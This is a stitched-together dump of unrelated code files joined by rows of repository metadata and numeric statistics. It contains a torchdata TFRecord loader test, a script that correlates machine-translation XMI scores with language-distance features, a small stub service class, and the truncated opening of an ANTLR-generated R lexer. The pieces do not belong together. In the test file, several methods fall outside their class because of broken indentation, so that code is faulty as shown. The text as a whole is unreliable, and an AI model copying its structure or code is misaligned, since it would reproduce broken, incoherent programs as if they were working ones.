# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import os
import unittest
import warnings
from functools import partial
import expecttest
import numpy as np
import torch
from _utils._common_utils_for_test import reset_after_n_next_calls
from torchdata.datapipes.iter import (
FileLister,
FileOpener,
FSSpecFileLister,
FSSpecFileOpener,
FSSpecSaver,
IterableWrapper,
TFRecordLoader,
)
class TestDataPipeTFRecord(expecttest.TestCase):
    def setUp(self):
        # Directory that holds the pre-generated .tfrecord fixture files
        # (resolved relative to this test module).
        self.temp_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "_fakedata", "tfrecord")
    def assertArrayEqual(self, arr1, arr2):
        """Assert two array-likes are element-wise equal (numpy semantics)."""
        np.testing.assert_array_equal(arr1, arr2)
def _ground_truth_data(self):
for i in range(4):
x = torch.range(i * 10, (i + 1) * 10 - 1)
yield {
"x_float": x,
"x_int": (x * 10).long(),
"x_byte": [b"test str"],
}
def _ground_truth_seq_data(self):
for i in range(4):
x = torch.range(i * 10, (i + 1) * 10 - 1)
rep = 2 * i + 3
yield {"x_float": x, "x_int": (x * 10).long(), "x_byte": [b"test str"]}, {
"x_float_seq": [x] * rep,
"x_int_seq": [(x * 10).long()] * rep,
"x_byte_seq": [[b"test str"]] * rep,
}
    @torch.no_grad()
    def test_tfrecord_loader_example_iterdatapipe(self):
        """End-to-end checks of TFRecordLoader on plain Example records."""
        filename = f"{self.temp_dir}/example.tfrecord"
        datapipe1 = IterableWrapper([filename])
        datapipe2 = FileOpener(datapipe1, mode="b")
        # Functional Test: test if the returned data is correct
        tfrecord_parser = datapipe2.load_from_tfrecord()
        result = list(tfrecord_parser)
        self.assertEqual(len(result), 4)
        # keep a second reference for the reset test further down
        expected_res = final_expected_res = list(self._ground_truth_data())
        for true_data, loaded_data in zip(expected_res, result):
            self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
            for key in ["x_float", "x_int"]:
                self.assertArrayEqual(true_data[key].numpy(), loaded_data[key].numpy())
            self.assertEqual(len(loaded_data["x_byte"]), 1)
            self.assertEqual(true_data["x_byte"][0], loaded_data["x_byte"][0])
        # Functional Test: test if the shape of the returned data is correct when using spec
        tfrecord_parser = datapipe2.load_from_tfrecord(
            {
                "x_float": ((5, 2), torch.float64),
                "x_int": ((5, 2), torch.int32),
                "x_byte": (tuple(), None),
            }
        )
        result = list(tfrecord_parser)
        self.assertEqual(len(result), 4)
        expected_res = [
            {
                "x_float": x["x_float"].reshape(5, 2),
                "x_int": x["x_int"].reshape(5, 2),
                "x_byte": x["x_byte"][0],
            }
            for x in self._ground_truth_data()
        ]
        for true_data, loaded_data in zip(expected_res, result):
            self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
            self.assertArrayEqual(true_data["x_float"].numpy(), loaded_data["x_float"].float().numpy())
            self.assertArrayEqual(true_data["x_int"].numpy(), loaded_data["x_int"].long().numpy())
            # the spec also controls the output dtypes
            self.assertEqual(loaded_data["x_float"].dtype, torch.float64)
            self.assertEqual(loaded_data["x_int"].dtype, torch.int32)
            self.assertEqual(true_data["x_byte"], loaded_data["x_byte"])
        # Functional Test: ignore features missing from spec
        tfrecord_parser = datapipe2.load_from_tfrecord(
            {
                "x_float": ((10,), torch.float32),
            }
        )
        result = list(tfrecord_parser)
        self.assertEqual(len(result), 4)
        expected_res = [
            {
                "x_float": x["x_float"],
            }
            for x in self._ground_truth_data()
        ]
        for true_data, loaded_data in zip(expected_res, result):
            self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
            self.assertArrayEqual(true_data["x_float"].numpy(), loaded_data["x_float"].float().numpy())
        # Functional Test: raises error if missing spec feature
        with self.assertRaises(RuntimeError):
            tfrecord_parser = datapipe2.load_from_tfrecord(
                {
                    "x_float_unknown": ((5, 2), torch.float64),
                    "x_int": ((5, 2), torch.int32),
                    "x_byte": (tuple(), None),
                }
            )
            result = list(tfrecord_parser)
        # Reset Test:
        tfrecord_parser = TFRecordLoader(datapipe2)
        expected_res = final_expected_res
        n_elements_before_reset = 2
        res_before_reset, res_after_reset = reset_after_n_next_calls(tfrecord_parser, n_elements_before_reset)
        self.assertEqual(len(expected_res[:n_elements_before_reset]), len(res_before_reset))
        for true_data, loaded_data in zip(expected_res[:n_elements_before_reset], res_before_reset):
            self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
            for key in ["x_float", "x_int"]:
                self.assertArrayEqual(true_data[key].numpy(), loaded_data[key].numpy())
            self.assertEqual(true_data["x_byte"][0], loaded_data["x_byte"][0])
        # after a reset the full stream is produced again
        self.assertEqual(len(expected_res), len(res_after_reset))
        for true_data, loaded_data in zip(expected_res, res_after_reset):
            self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
            for key in ["x_float", "x_int"]:
                self.assertArrayEqual(true_data[key].numpy(), loaded_data[key].numpy())
            self.assertEqual(true_data["x_byte"][0], loaded_data["x_byte"][0])
        # __len__ Test: length isn't implemented since it cannot be known ahead of time
        with self.assertRaisesRegex(TypeError, "doesn't have valid length"):
            len(tfrecord_parser)
@torch.no_grad()
def test_tfrecord_loader_sequence_example_iterdatapipe(self):
    """End-to-end checks for TFRecordLoader on a SequenceExample tfrecord file.

    Covers: default parsing, parsing with an explicit spec (dtype casts,
    reshaping, and variable-length sequence features), spec-based feature
    filtering, the RuntimeError raised for a spec feature absent from the
    records, iterator reset behaviour, and the absence of ``__len__``.

    NOTE(review): assumes ``self.temp_dir`` already contains
    ``sequence_example.tfrecord`` with 4 records matching
    ``self._ground_truth_seq_data()`` — presumably written by the test
    fixture; confirm against setUp.
    """
    filename = f"{self.temp_dir}/sequence_example.tfrecord"
    datapipe1 = IterableWrapper([filename])
    datapipe2 = FileOpener(datapipe1, mode="b")
    # Functional Test: test if the returned data is correct
    tfrecord_parser = datapipe2.load_from_tfrecord()
    result = list(tfrecord_parser)
    self.assertEqual(len(result), 4)
    # Keep a second reference to the untransformed ground truth; the
    # reset test at the bottom reuses it after expected_res is rebound.
    expected_res = final_expected_res = list(self._ground_truth_seq_data())
    for (true_data_ctx, true_data_seq), loaded_data in zip(expected_res, result):
        # Loaded records must expose the union of context and sequence keys.
        self.assertSetEqual(set(true_data_ctx.keys()).union(true_data_seq.keys()), set(loaded_data.keys()))
        for key in ["x_float", "x_int"]:
            self.assertArrayEqual(true_data_ctx[key].numpy(), loaded_data[key].numpy())
            self.assertEqual(len(true_data_seq[key + "_seq"]), len(loaded_data[key + "_seq"]))
            # Sequence features come back as Python lists of per-step arrays.
            self.assertIsInstance(loaded_data[key + "_seq"], list)
            for a1, a2 in zip(true_data_seq[key + "_seq"], loaded_data[key + "_seq"]):
                self.assertArrayEqual(a1, a2)
        self.assertEqual(true_data_ctx["x_byte"], loaded_data["x_byte"])
        self.assertListEqual(true_data_seq["x_byte_seq"], loaded_data["x_byte_seq"])
    # Functional Test: test if the shape of the returned data is correct when using spec
    # -1 in a sequence-feature shape marks the variable (time-step) dimension.
    tfrecord_parser = datapipe2.load_from_tfrecord(
        {
            "x_float": ((5, 2), torch.float64),
            "x_int": ((5, 2), torch.int32),
            "x_byte": (tuple(), None),
            "x_float_seq": ((-1, 5, 2), torch.float64),
            "x_int_seq": ((-1, 5, 2), torch.int32),
            "x_byte_seq": ((-1,), None),
        }
    )
    result = list(tfrecord_parser)
    self.assertEqual(len(result), 4)
    # Reshape the ground truth to mirror the spec above: (context, sequence) pairs.
    expected_res = [
        (
            {
                "x_float": x["x_float"].reshape(5, 2),
                "x_int": x["x_int"].reshape(5, 2),
                "x_byte": x["x_byte"][0],
            },
            {
                "x_float_seq": [y.reshape(5, 2).numpy() for y in z["x_float_seq"]],
                "x_int_seq": [y.reshape(5, 2).numpy() for y in z["x_int_seq"]],
                "x_byte_seq": [y[0] for y in z["x_byte_seq"]],
            },
        )
        for x, z in self._ground_truth_seq_data()
    ]
    for (true_data_ctx, true_data_seq), loaded_data in zip(expected_res, result):
        self.assertSetEqual(set(true_data_ctx.keys()).union(true_data_seq.keys()), set(loaded_data.keys()))
        for key in ["x_float", "x_int"]:
            # Cast loaded tensors back to the ground-truth dtypes before comparing,
            # since the spec requested float64/int32.
            l_loaded_data = loaded_data[key]
            if key == "x_float":
                l_loaded_data = l_loaded_data.float()
            else:
                l_loaded_data = l_loaded_data.int()
            self.assertArrayEqual(true_data_ctx[key].numpy(), l_loaded_data.numpy())
            self.assertArrayEqual(true_data_seq[key + "_seq"], loaded_data[key + "_seq"])
        self.assertEqual(true_data_ctx["x_byte"], loaded_data["x_byte"])
        self.assertListEqual(true_data_seq["x_byte_seq"], loaded_data["x_byte_seq"])
    # Functional Test: ignore features missing from spec
    tfrecord_parser = datapipe2.load_from_tfrecord(
        {
            "x_float": ((10,), torch.float32),
        }
    )
    result = list(tfrecord_parser)
    self.assertEqual(len(result), 4)
    expected_res = [
        {
            "x_float": x["x_float"],
        }
        for x, z in self._ground_truth_seq_data()
    ]
    for true_data, loaded_data in zip(expected_res, result):
        # Only the single spec'd key should survive.
        self.assertSetEqual(set(true_data.keys()), set(loaded_data.keys()))
        self.assertArrayEqual(true_data["x_float"].numpy(), loaded_data["x_float"].float().numpy())
    # Functional Test: raises error if missing spec feature
    with self.assertRaises(RuntimeError):
        tfrecord_parser = datapipe2.load_from_tfrecord(
            {"x_float_unknown": ((5, 2), torch.float64), "x_int": ((5, 2), torch.int32), "x_byte": None}
        )
        # Error surfaces lazily, on iteration.
        result = list(tfrecord_parser)
    # Reset Test:
    tfrecord_parser = TFRecordLoader(datapipe2)
    expected_res = final_expected_res
    n_elements_before_reset = 2
    res_before_reset, res_after_reset = reset_after_n_next_calls(tfrecord_parser, n_elements_before_reset)
    self.assertEqual(len(expected_res[:n_elements_before_reset]), len(res_before_reset))
    for (true_data_ctx, true_data_seq), loaded_data in zip(
        expected_res[:n_elements_before_reset], res_before_reset
    ):
        self.assertSetEqual(set(true_data_ctx.keys()).union(true_data_seq.keys()), set(loaded_data.keys()))
        for key in ["x_float", "x_int"]:
            self.assertArrayEqual(true_data_ctx[key].numpy(), loaded_data[key].numpy())
            self.assertEqual(len(true_data_seq[key + "_seq"]), len(loaded_data[key + "_seq"]))
            self.assertIsInstance(loaded_data[key + "_seq"], list)
            for a1, a2 in zip(true_data_seq[key + "_seq"], loaded_data[key + "_seq"]):
                self.assertArrayEqual(a1, a2)
        self.assertEqual(true_data_ctx["x_byte"], loaded_data["x_byte"])
        self.assertListEqual(true_data_seq["x_byte_seq"], loaded_data["x_byte_seq"])
    # After a reset the full stream must be yielded again from the start.
    self.assertEqual(len(expected_res), len(res_after_reset))
    for (true_data_ctx, true_data_seq), loaded_data in zip(expected_res, res_after_reset):
        self.assertSetEqual(set(true_data_ctx.keys()).union(true_data_seq.keys()), set(loaded_data.keys()))
        for key in ["x_float", "x_int"]:
            self.assertArrayEqual(true_data_ctx[key].numpy(), loaded_data[key].numpy())
            self.assertEqual(len(true_data_seq[key + "_seq"]), len(loaded_data[key + "_seq"]))
            self.assertIsInstance(loaded_data[key + "_seq"], list)
            for a1, a2 in zip(true_data_seq[key + "_seq"], loaded_data[key + "_seq"]):
                self.assertArrayEqual(a1, a2)
        self.assertEqual(true_data_ctx["x_byte"], loaded_data["x_byte"])
        self.assertListEqual(true_data_seq["x_byte_seq"], loaded_data["x_byte_seq"])
    # __len__ Test: length isn't implemented since it cannot be known ahead of time
    with self.assertRaisesRegex(TypeError, "doesn't have valid length"):
        len(tfrecord_parser)
# Allow running this test module directly as well as via a test runner.
if __name__ == "__main__":
    unittest.main()
| 46.847273
| 111
| 0.598463
| 1,616
| 12,883
| 4.46349
| 0.113243
| 0.085956
| 0.028975
| 0.027035
| 0.872175
| 0.852489
| 0.835575
| 0.826702
| 0.808956
| 0.80854
| 0
| 0.014863
| 0.274082
| 12,883
| 274
| 112
| 47.018248
| 0.756416
| 0.066832
| 0
| 0.564655
| 0
| 0
| 0.078057
| 0.006081
| 0
| 0
| 0
| 0
| 0.267241
| 1
| 0.025862
| false
| 0
| 0.038793
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
188303be89e27356e2870e46d7fec182b911169d
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/zipp.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/zipp.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/zipp.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/c0/c4/a8/6310083e0627a89016d09700979b16688705739c64ddd3637fa1251a05
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.520833
| 0
| 96
| 1
| 96
| 96
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
43fed542a413270455edceb8b9985b3db7da3f9a
| 3,477
|
py
|
Python
|
scripts/results/mcc_hpe_adl.py
|
Ayushk4/nmt-difficulty
|
d4c8252abf091701a2ba4d85fb6a79a3720d9748
|
[
"MIT"
] | 8
|
2020-05-06T09:47:55.000Z
|
2022-02-26T07:36:28.000Z
|
scripts/results/mcc_hpe_adl.py
|
Ayushk4/nmt-difficulty
|
d4c8252abf091701a2ba4d85fb6a79a3720d9748
|
[
"MIT"
] | null | null | null |
scripts/results/mcc_hpe_adl.py
|
Ayushk4/nmt-difficulty
|
d4c8252abf091701a2ba4d85fb6a79a3720d9748
|
[
"MIT"
] | 1
|
2021-05-20T06:06:56.000Z
|
2021-05-20T06:06:56.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scipy import stats
import pandas as pd
def get_correlations(df, name=None):
    """Print and return Pearson and Spearman correlations between the first
    two columns of *df*.

    Args:
        df: DataFrame whose first column is the x-variable and whose second
            column is the y-variable (any further columns are ignored).
        name: Optional row label printed in front of the statistics; an
            empty label is used when omitted.

    Returns:
        Tuple ``(pearson_r, pearson_p, spearman_rho, spearman_p)``.
    """
    xs = df.values[:, 0]
    ys = df.values[:, 1]
    pearson_r, pearson_p = stats.pearsonr(xs, ys)
    spearman_rho, spearman_p = stats.spearmanr(xs, ys)
    if not name:
        name = ''
    print(name, '\t', '%.4f' % pearson_r, '(%.4f)' % pearson_p, '\t', '%.4f' % spearman_rho, '(%.4f)' % spearman_p)
    # Return the raw statistics so callers can consume them programmatically.
    # Backward compatible: the original implicitly returned None, which no
    # caller in this script uses.
    return pearson_r, pearson_p, spearman_rho, spearman_p
# Load cross-mutual-information (XMI) scores, indexed by (src, tgt) language pair.
xmi = pd.read_csv("../../results/test/xmi.mt.csv").set_index(["src", "tgt"]).rename(columns={"value":"xmi"})
# For each distance feature (MCC, ADL, HPE), load the per-language values twice --
# once keyed on the target language, once on the source language -- then join both
# onto the XMI table so every row carries xmi, metric_src, and metric_tgt.
mcc_tgt = pd.read_csv("../../results/features/mcc.csv").rename(columns={"lang": "tgt"}).set_index("tgt").rename(columns={"value":"metric_tgt"})
mcc_src = pd.read_csv("../../results/features/mcc.csv").rename(columns={"lang": "src"}).set_index("src").rename(columns={"value":"metric_src"})
xmi_mcc = xmi.merge(mcc_tgt, left_index=True, right_index=True).merge(mcc_src, left_index=True, right_index=True)
adl_tgt = pd.read_csv("../../results/features/adl.csv").rename(columns={"lang": "tgt"}).set_index("tgt").rename(columns={"value":"metric_tgt"})
adl_src = pd.read_csv("../../results/features/adl.csv").rename(columns={"lang": "src"}).set_index("src").rename(columns={"value":"metric_src"})
xmi_adl = xmi.merge(adl_tgt, left_index=True, right_index=True).merge(adl_src, left_index=True, right_index=True)
hpe_tgt = pd.read_csv("../../results/features/hpe.csv").rename(columns={"lang": "tgt"}).set_index("tgt").rename(columns={"value":"metric_tgt"})
hpe_src = pd.read_csv("../../results/features/hpe.csv").rename(columns={"lang": "src"}).set_index("src").rename(columns={"value":"metric_src"})
xmi_hpe = xmi.merge(hpe_tgt, left_index=True, right_index=True).merge(hpe_src, left_index=True, right_index=True)
# Report 1: correlations restricted to pairs translating INTO English (tgt == 'en').
print('Into En')
print('Distance\t Pearson\t\t Spearman')
get_correlations(xmi_mcc.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_src']], name='MCC_src')
get_correlations(xmi_mcc.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_tgt']], name='MCC_tgt')
get_correlations(xmi_adl.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_src']], name='ADL_src')
get_correlations(xmi_adl.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_tgt']], name='ADL_tgt')
get_correlations(xmi_hpe.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_src']], name='HPE_src')
get_correlations(xmi_hpe.loc[pd.IndexSlice[:, 'en'], ['xmi', 'metric_tgt']], name='HPE_tgt')
# Report 2: correlations restricted to pairs translating FROM English (src == 'en').
print('From En')
print('Distance\t Pearson\t\t Spearman')
get_correlations(xmi_mcc.loc[pd.IndexSlice['en', :], ['xmi', 'metric_src']], name='MCC_src')
get_correlations(xmi_mcc.loc[pd.IndexSlice['en', :], ['xmi', 'metric_tgt']], name='MCC_tgt')
get_correlations(xmi_adl.loc[pd.IndexSlice['en', :], ['xmi', 'metric_src']], name='ADL_src')
get_correlations(xmi_adl.loc[pd.IndexSlice['en', :], ['xmi', 'metric_tgt']], name='ADL_tgt')
get_correlations(xmi_hpe.loc[pd.IndexSlice['en', :], ['xmi', 'metric_src']], name='HPE_src')
get_correlations(xmi_hpe.loc[pd.IndexSlice['en', :], ['xmi', 'metric_tgt']], name='HPE_tgt')
# Report 3: correlations over all language pairs.
print('Both')
print('Distance\t Pearson\t\t Spearman')
get_correlations(xmi_mcc.loc[:, ['xmi', 'metric_src']], name='MCC_src')
get_correlations(xmi_mcc.loc[:, ['xmi', 'metric_tgt']], name='MCC_tgt')
get_correlations(xmi_adl.loc[:, ['xmi', 'metric_src']], name='ADL_src')
get_correlations(xmi_adl.loc[:, ['xmi', 'metric_tgt']], name='ADL_tgt')
get_correlations(xmi_hpe.loc[:, ['xmi', 'metric_src']], name='HPE_src')
get_correlations(xmi_hpe.loc[:, ['xmi', 'metric_tgt']], name='HPE_tgt')
| 59.948276
| 143
| 0.685361
| 534
| 3,477
| 4.222846
| 0.123596
| 0.126386
| 0.143681
| 0.090466
| 0.821729
| 0.821729
| 0.807982
| 0.76408
| 0.717517
| 0.717517
| 0
| 0.002167
| 0.070751
| 3,477
| 57
| 144
| 61
| 0.69576
| 0.012079
| 0
| 0.068182
| 0
| 0
| 0.259907
| 0.060897
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022727
| false
| 0
| 0.045455
| 0
| 0.068182
| 0.159091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a1602e01e346e931356bab7a8154bf262de1e2ee
| 42
|
py
|
Python
|
parqser/web_component/__init__.py
|
ARQtty/parqser
|
2f4f9505544d718dc818d1d9177ac1394bfbb352
|
[
"MIT"
] | null | null | null |
parqser/web_component/__init__.py
|
ARQtty/parqser
|
2f4f9505544d718dc818d1d9177ac1394bfbb352
|
[
"MIT"
] | null | null | null |
parqser/web_component/__init__.py
|
ARQtty/parqser
|
2f4f9505544d718dc818d1d9177ac1394bfbb352
|
[
"MIT"
] | null | null | null |
from .base_component import BaseComponent
| 21
| 41
| 0.880952
| 5
| 42
| 7.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a16425a64319b700eaebabdcf78c07fa92f8d5b4
| 120
|
py
|
Python
|
mala/common/__init__.py
|
DanielKotik/mala
|
1b89a78f5ddecb1df21d2753715001ffe4250fc1
|
[
"BSD-3-Clause"
] | null | null | null |
mala/common/__init__.py
|
DanielKotik/mala
|
1b89a78f5ddecb1df21d2753715001ffe4250fc1
|
[
"BSD-3-Clause"
] | null | null | null |
mala/common/__init__.py
|
DanielKotik/mala
|
1b89a78f5ddecb1df21d2753715001ffe4250fc1
|
[
"BSD-3-Clause"
] | null | null | null |
"""General functions for MALA, such as parameters."""
from .parameters import Parameters
from .printout import printout
| 30
| 53
| 0.791667
| 15
| 120
| 6.333333
| 0.666667
| 0.294737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 120
| 3
| 54
| 40
| 0.904762
| 0.391667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
a181539b6b4056078e2d1a8af2c0f216f66bab67
| 254
|
py
|
Python
|
globals/api/test/api/src/service/MyIgnorableService.py
|
SamuelJansen/Globals
|
49a5ac10b18642ffbc54745c9bd55bf358ca73df
|
[
"MIT"
] | 2
|
2020-07-03T06:35:39.000Z
|
2020-07-23T00:25:45.000Z
|
globals/api/test/api/src/service/MyIgnorableService.py
|
SamuelJansen/Globals
|
49a5ac10b18642ffbc54745c9bd55bf358ca73df
|
[
"MIT"
] | 1
|
2021-05-26T20:35:05.000Z
|
2021-06-12T06:50:30.000Z
|
globals/api/test/api/src/service/MyIgnorableService.py
|
SamuelJansen/Globals
|
49a5ac10b18642ffbc54745c9bd55bf358ca73df
|
[
"MIT"
] | 1
|
2020-11-01T02:07:34.000Z
|
2020-11-01T02:07:34.000Z
|
class MyIgnorableClass:
    """Stub service used to exercise 'ignorable' class handling in tests."""

    def getServiceValue(self, argument):
        """Echo *argument* inside a fixed, recognizable service string."""
        return f'ignorable service value: {argument}'
class MyOtherIgnorableClass:
    """Second stub service, distinguishable from MyIgnorableClass by its output."""

    def getServiceValue(self, argument):
        """Echo *argument* inside this class's distinct marker string."""
        return f'other ignorable service value: {argument}'
| 31.75
| 59
| 0.724409
| 25
| 254
| 7.36
| 0.52
| 0.195652
| 0.23913
| 0.326087
| 0.402174
| 0.402174
| 0
| 0
| 0
| 0
| 0
| 0
| 0.19685
| 254
| 7
| 60
| 36.285714
| 0.901961
| 0
| 0
| 0.333333
| 0
| 0
| 0.299213
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
a19918e7f152cf988f179485330dbf82cfb838f2
| 21,978
|
py
|
Python
|
src/pycropml/transpiler/antlr_py/grammars/RLexer.py
|
brichet/PyCrop2ML
|
7177996f72a8d95fdbabb772a16f1fd87b1d033e
|
[
"MIT"
] | 5
|
2020-06-21T18:58:04.000Z
|
2022-01-29T21:32:28.000Z
|
src/pycropml/transpiler/antlr_py/grammars/RLexer.py
|
brichet/PyCrop2ML
|
7177996f72a8d95fdbabb772a16f1fd87b1d033e
|
[
"MIT"
] | 27
|
2018-12-04T15:35:44.000Z
|
2022-03-11T08:25:03.000Z
|
src/pycropml/transpiler/antlr_py/grammars/RLexer.py
|
brichet/PyCrop2ML
|
7177996f72a8d95fdbabb772a16f1fd87b1d033e
|
[
"MIT"
] | 7
|
2019-04-20T02:25:22.000Z
|
2021-11-04T07:52:35.000Z
|
# Generated from Documents\THESE\pycropml_pheno\src\pycropml\antlr_grammarV4\r\R.g4 by ANTLR 4.8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2B")
buf.write("\u0215\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\t")
buf.write("C\4D\tD\4E\tE\4F\tF\4G\tG\4H\tH\4I\tI\4J\tJ\3\2\3\2\3")
buf.write("\3\3\3\3\3\3\4\3\4\3\5\3\5\3\6\3\6\3\6\3\7\3\7\3\7\3\7")
buf.write("\3\b\3\b\3\t\3\t\3\n\3\n\3\13\3\13\3\f\3\f\3\r\3\r\3\16")
buf.write("\3\16\3\17\3\17\3\20\3\20\3\21\3\21\3\21\3\22\3\22\3\23")
buf.write("\3\23\3\23\3\24\3\24\3\24\3\25\3\25\3\25\3\26\3\26\3\27")
buf.write("\3\27\3\30\3\30\3\30\3\31\3\31\3\32\3\32\3\32\3\33\3\33")
buf.write("\3\34\3\34\3\34\3\35\3\35\3\35\3\35\3\36\3\36\3\37\3\37")
buf.write("\3\37\3 \3 \3 \3 \3!\3!\3!\3\"\3\"\3\"\3\"\3\"\3\"\3\"")
buf.write("\3\"\3\"\3#\3#\3$\3$\3%\3%\3&\3&\3\'\3\'\3\'\3(\3(\3(")
buf.write("\3(\3(\3)\3)\3)\3)\3*\3*\3*\3+\3+\3+\3+\3+\3+\3,\3,\3")
buf.write(",\3,\3,\3,\3,\3-\3-\3.\3.\3.\3.\3.\3/\3/\3/\3/\3/\3/\3")
buf.write("\60\3\60\3\60\3\60\3\60\3\61\3\61\3\61\3\62\3\62\3\62")
buf.write("\3\62\3\63\3\63\3\63\3\63\3\64\3\64\3\64\3\64\3\64\3\65")
buf.write("\3\65\3\65\3\65\3\65\3\65\3\66\3\66\3\67\3\67\3\67\3\67")
buf.write("\38\38\39\39\39\69\u0147\n9\r9\169\u0148\39\59\u014c\n")
buf.write("9\3:\6:\u014f\n:\r:\16:\u0150\3:\5:\u0154\n:\3;\3;\3<")
buf.write("\6<\u0159\n<\r<\16<\u015a\3<\3<\7<\u015f\n<\f<\16<\u0162")
buf.write("\13<\3<\5<\u0165\n<\3<\5<\u0168\n<\3<\6<\u016b\n<\r<\16")
buf.write("<\u016c\3<\5<\u0170\n<\3<\5<\u0173\n<\3<\3<\6<\u0177\n")
buf.write("<\r<\16<\u0178\3<\5<\u017c\n<\3<\5<\u017f\n<\5<\u0181")
buf.write("\n<\3=\3=\3>\3>\5>\u0187\n>\3>\3>\3?\3?\3?\3?\3?\3?\5")
buf.write("?\u0191\n?\3@\3@\3@\7@\u0196\n@\f@\16@\u0199\13@\3@\3")
buf.write("@\3@\3@\7@\u019f\n@\f@\16@\u01a2\13@\3@\3@\3@\3@\7@\u01a8")
buf.write("\n@\f@\16@\u01ab\13@\3@\5@\u01ae\n@\3A\3A\3A\3A\3A\5A")
buf.write("\u01b5\nA\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3B\3")
buf.write("B\3B\5B\u01c7\nB\3C\3C\3C\3C\3C\3C\3C\3C\3C\5C\u01d2\n")
